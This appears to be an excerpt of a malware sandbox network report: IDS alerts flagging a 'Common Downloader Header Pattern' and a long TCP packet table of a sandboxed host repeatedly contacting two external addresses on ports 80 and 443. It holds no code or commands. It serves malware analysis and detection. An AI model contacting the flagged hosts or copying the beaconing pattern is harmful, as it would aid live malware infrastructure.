2024-12-13T17:58:03.716713+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49718	132.226.8.169	80	TCP
2024-12-13T17:58:05.204248+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49725	172.67.177.134	443	TCP
2024-12-13T17:58:05.966712+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49718	132.226.8.169	80	TCP
2024-12-13T17:58:07.451077+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49732	132.226.8.169	80	TCP
2024-12-13T17:58:07.597260+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49733	172.67.177.134	443	TCP
2024-12-13T17:58:09.216680+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49740	132.226.8.169	80	TCP
2024-12-13T17:58:10.858250+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49747	172.67.177.134	443	TCP
2024-12-13T17:58:25.280469+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49797	172.67.177.134	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 17:57:57.587492943 CET	49711	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:57:57.707611084 CET	80	49711	132.226.8.169	192.168.2.11
Dec 13, 2024 17:57:57.709860086 CET	49711	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:57:57.710114002 CET	49711	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:57:57.829859018 CET	80	49711	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:00.626785994 CET	80	49711	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:00.631180048 CET	49711	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:00.751194954 CET	80	49711	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:00.827866077 CET	49718	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:00.948000908 CET	80	49718	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:00.948126078 CET	49718	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:00.948458910 CET	49718	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:01.068253994 CET	80	49718	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:01.121453047 CET	80	49711	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:01.232446909 CET	49711	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:01.306577921 CET	49719	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:01.306622982 CET	443	49719	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:01.309987068 CET	49719	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:01.316838980 CET	49719	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:01.316855907 CET	443	49719	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:02.532780886 CET	443	49719	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:02.532915115 CET	49719	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:02.568478107 CET	49719	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:02.568495035 CET	443	49719	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:02.568780899 CET	443	49719	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:02.621751070 CET	49719	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:02.663326025 CET	443	49719	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:03.000602961 CET	443	49719	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:03.000665903 CET	443	49719	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:03.001068115 CET	49719	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:03.013062000 CET	49719	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:03.016973019 CET	49711	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:03.129709959 CET	80	49718	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:03.134583950 CET	49718	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:03.137821913 CET	80	49711	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:03.254883051 CET	80	49718	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:03.506664038 CET	80	49711	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:03.509042978 CET	49725	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:03.509088993 CET	443	49725	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:03.509223938 CET	49725	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:03.509635925 CET	49725	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:03.509653091 CET	443	49725	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:03.638571978 CET	49711	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:03.673341990 CET	80	49718	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:03.716712952 CET	49718	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:03.720263004 CET	49726	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:03.720309019 CET	443	49726	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:03.720416069 CET	49726	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:03.724752903 CET	49726	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:03.724771976 CET	443	49726	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:04.724564075 CET	443	49725	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:04.754312992 CET	49725	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:04.754334927 CET	443	49725	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:04.940371990 CET	443	49726	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:04.940463066 CET	49726	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:04.942403078 CET	49726	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:04.942414045 CET	443	49726	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:04.942697048 CET	443	49726	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:04.994402885 CET	49726	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:05.035340071 CET	443	49726	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:05.204334021 CET	443	49725	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:05.204499960 CET	443	49725	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:05.204552889 CET	49725	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:05.204999924 CET	49725	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:05.208494902 CET	49711	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:05.209656000 CET	49732	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:05.328579903 CET	80	49711	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:05.328635931 CET	49711	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:05.329363108 CET	80	49732	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:05.329442024 CET	49732	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:05.329756975 CET	49732	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:05.400755882 CET	443	49726	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:05.400826931 CET	443	49726	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:05.400868893 CET	49726	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:05.405128002 CET	49726	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:05.419488907 CET	49718	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:05.449498892 CET	80	49732	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:05.539381981 CET	80	49718	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:05.918910027 CET	80	49718	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:05.921034098 CET	49733	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:05.921065092 CET	443	49733	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:05.921149969 CET	49733	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:05.921540976 CET	49733	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:05.921556950 CET	443	49733	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:05.966711998 CET	49718	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:07.140840054 CET	443	49733	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:07.147073030 CET	49733	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:07.147106886 CET	443	49733	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:07.408196926 CET	80	49732	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:07.409672976 CET	49739	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:07.409708977 CET	443	49739	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:07.409858942 CET	49739	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:07.410110950 CET	49739	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:07.410124063 CET	443	49739	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:07.451076984 CET	49732	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:07.597352982 CET	443	49733	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:07.597510099 CET	443	49733	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:07.597574949 CET	49733	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:07.598227978 CET	49733	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:07.602394104 CET	49718	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:07.603943110 CET	49740	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:07.724483013 CET	80	49718	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:07.724605083 CET	49718	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:07.725363970 CET	80	49740	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:07.725625038 CET	49740	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:07.725774050 CET	49740	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:07.845556974 CET	80	49740	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:08.633563042 CET	443	49739	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:08.635337114 CET	49739	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:08.635359049 CET	443	49739	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:09.092137098 CET	443	49739	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:09.092197895 CET	443	49739	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:09.092437029 CET	49739	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:09.092892885 CET	49739	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:09.099509954 CET	49746	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:09.169523001 CET	80	49740	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:09.175081015 CET	49747	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:09.175107956 CET	443	49747	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:09.175247908 CET	49747	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:09.175831079 CET	49747	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:09.175848007 CET	443	49747	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:09.216680050 CET	49740	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:09.219342947 CET	80	49746	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:09.219419956 CET	49746	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:09.219557047 CET	49746	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:09.339323044 CET	80	49746	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:10.396743059 CET	443	49747	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:10.398674011 CET	49747	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:10.398700953 CET	443	49747	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:10.699600935 CET	80	49746	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:10.701100111 CET	49749	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:10.701198101 CET	443	49749	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:10.701282978 CET	49749	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:10.701589108 CET	49749	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:10.701625109 CET	443	49749	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:10.747950077 CET	49746	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:10.858339071 CET	443	49747	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:10.858489037 CET	443	49747	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:10.858607054 CET	49747	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:10.858990908 CET	49747	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:10.863953114 CET	49750	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:10.984379053 CET	80	49750	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:10.984638929 CET	49750	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:10.984638929 CET	49750	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:11.104463100 CET	80	49750	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:11.915261984 CET	443	49749	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:11.917072058 CET	49749	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:11.917117119 CET	443	49749	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:12.367924929 CET	443	49749	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:12.368010998 CET	443	49749	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:12.368077993 CET	49749	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:12.368464947 CET	49749	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:12.371876955 CET	49746	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:12.372960091 CET	49757	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:12.401978970 CET	80	49750	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:12.403266907 CET	49758	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:12.403301001 CET	443	49758	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:12.403367043 CET	49758	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:12.403601885 CET	49758	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:12.403616905 CET	443	49758	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:12.451210976 CET	49750	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:12.491887093 CET	80	49746	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:12.492031097 CET	49746	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:12.492763042 CET	80	49757	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:12.496514082 CET	49757	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:12.497014046 CET	49757	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:12.616811991 CET	80	49757	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:13.617228031 CET	443	49758	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:13.628462076 CET	49758	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:13.628493071 CET	443	49758	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:13.916088104 CET	80	49757	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:13.917474031 CET	49765	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:13.917581081 CET	443	49765	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:13.917673111 CET	49765	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:13.917970896 CET	49765	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:13.918008089 CET	443	49765	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:13.966686010 CET	49757	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:14.099652052 CET	443	49758	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:14.099713087 CET	443	49758	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:14.099773884 CET	49758	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:14.100342035 CET	49758	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:14.116076946 CET	49766	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:14.116616011 CET	49750	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:14.237977028 CET	80	49766	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:14.238750935 CET	80	49750	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:14.239017963 CET	49750	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:14.239017963 CET	49766	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:14.239017963 CET	49766	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:14.359163046 CET	80	49766	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:15.132908106 CET	443	49765	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:15.142400980 CET	49765	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:15.142426968 CET	443	49765	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:15.582374096 CET	443	49765	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:15.582434893 CET	443	49765	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:15.582506895 CET	49765	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:15.583250999 CET	49765	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:15.587909937 CET	49757	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:15.589128017 CET	49772	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:15.653450012 CET	80	49766	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:15.655114889 CET	49773	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:15.655148983 CET	443	49773	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:15.655235052 CET	49773	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:15.655507088 CET	49773	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:15.655518055 CET	443	49773	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:15.701359987 CET	49766	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:15.708575964 CET	80	49757	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:15.708700895 CET	49757	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:15.709498882 CET	80	49772	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:15.709584951 CET	49772	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:15.709763050 CET	49772	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:15.836152077 CET	80	49772	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:17.134248972 CET	443	49773	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:17.135123968 CET	80	49772	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:17.136390924 CET	49774	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:17.136416912 CET	443	49774	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:17.136487961 CET	49774	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:17.136709929 CET	49774	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:17.136719942 CET	443	49774	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:17.144459009 CET	49773	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:17.144475937 CET	443	49773	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:17.185477972 CET	49772	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:17.588068962 CET	443	49773	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:17.588139057 CET	443	49773	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:17.588186026 CET	49773	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:17.588861942 CET	49773	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:17.592664957 CET	49766	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:17.593827009 CET	49779	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:17.713052034 CET	80	49766	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:17.713570118 CET	80	49779	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:17.713650942 CET	49779	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:17.713737011 CET	49766	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:17.713839054 CET	49779	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:17.833492994 CET	80	49779	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:18.350820065 CET	443	49774	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:18.352360010 CET	49774	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:18.352382898 CET	443	49774	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:18.801000118 CET	443	49774	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:18.801093102 CET	443	49774	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:18.801151037 CET	49774	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:18.801621914 CET	49774	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:18.804830074 CET	49772	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:18.806057930 CET	49781	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:18.925282001 CET	80	49772	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:18.925393105 CET	49772	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:18.925730944 CET	80	49781	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:18.925801039 CET	49781	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:18.925951958 CET	49781	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:19.049720049 CET	80	49781	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:19.145230055 CET	80	49779	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:19.146506071 CET	49782	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:19.146553993 CET	443	49782	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:19.146656036 CET	49782	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:19.146852970 CET	49782	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:19.146863937 CET	443	49782	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:19.185539961 CET	49779	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:20.350414991 CET	80	49781	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:20.351886988 CET	49788	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:20.351969004 CET	443	49788	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:20.352056026 CET	49788	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:20.352328062 CET	49788	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:20.352355957 CET	443	49788	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:20.357909918 CET	443	49782	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:20.359374046 CET	49782	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:20.359395981 CET	443	49782	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:20.404272079 CET	49781	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:20.804749966 CET	443	49782	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:20.804821014 CET	443	49782	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:20.804913998 CET	49782	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:20.805458069 CET	49782	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:20.808790922 CET	49779	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:20.809937954 CET	49789	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:20.928765059 CET	80	49779	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:20.929033995 CET	49779	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:20.929714918 CET	80	49789	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:20.929796934 CET	49789	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:20.930030107 CET	49789	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:21.050175905 CET	80	49789	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:21.567011118 CET	443	49788	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:21.571202040 CET	49788	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:21.571284056 CET	443	49788	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:22.030745029 CET	443	49788	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:22.030900002 CET	443	49788	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:22.030999899 CET	49788	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:22.031434059 CET	49788	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:22.034573078 CET	49781	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:22.035573959 CET	49795	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:22.154777050 CET	80	49781	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:22.155333996 CET	80	49795	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:22.155441999 CET	49781	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:22.155488014 CET	49795	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:22.155662060 CET	49795	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:22.275568962 CET	80	49795	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:22.355760098 CET	80	49789	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:22.358186007 CET	49796	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:22.358227968 CET	443	49796	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:22.358338118 CET	49796	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:22.358604908 CET	49796	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:22.358613968 CET	443	49796	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:22.404300928 CET	49789	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:23.575176001 CET	443	49796	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:23.577049017 CET	49796	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:23.577146053 CET	443	49796	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:23.610057116 CET	80	49795	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:23.615010023 CET	49797	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:23.615051031 CET	443	49797	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:23.615163088 CET	49797	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:23.615372896 CET	49797	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:23.615386963 CET	443	49797	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:23.654288054 CET	49795	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:24.028934002 CET	443	49796	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:24.029012918 CET	443	49796	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:24.029196024 CET	49796	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:24.029958963 CET	49796	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:24.033436060 CET	49789	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:24.034384966 CET	49798	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:24.154203892 CET	80	49798	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:24.154329062 CET	80	49789	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:24.154344082 CET	49798	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:24.154437065 CET	49789	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:24.154633999 CET	49798	80	192.168.2.11	132.226.8.169
Dec 13, 2024 17:58:24.274560928 CET	80	49798	132.226.8.169	192.168.2.11
Dec 13, 2024 17:58:24.828481913 CET	443	49797	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:24.830735922 CET	49797	443	192.168.2.11	172.67.177.134
Dec 13, 2024 17:58:24.830777884 CET	443	49797	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:25.280556917 CET	443	49797	172.67.177.134	192.168.2.11
Dec 13, 2024 17:58:25.280734062 CET	443	49797	172.67.177.134	192.168.2.11
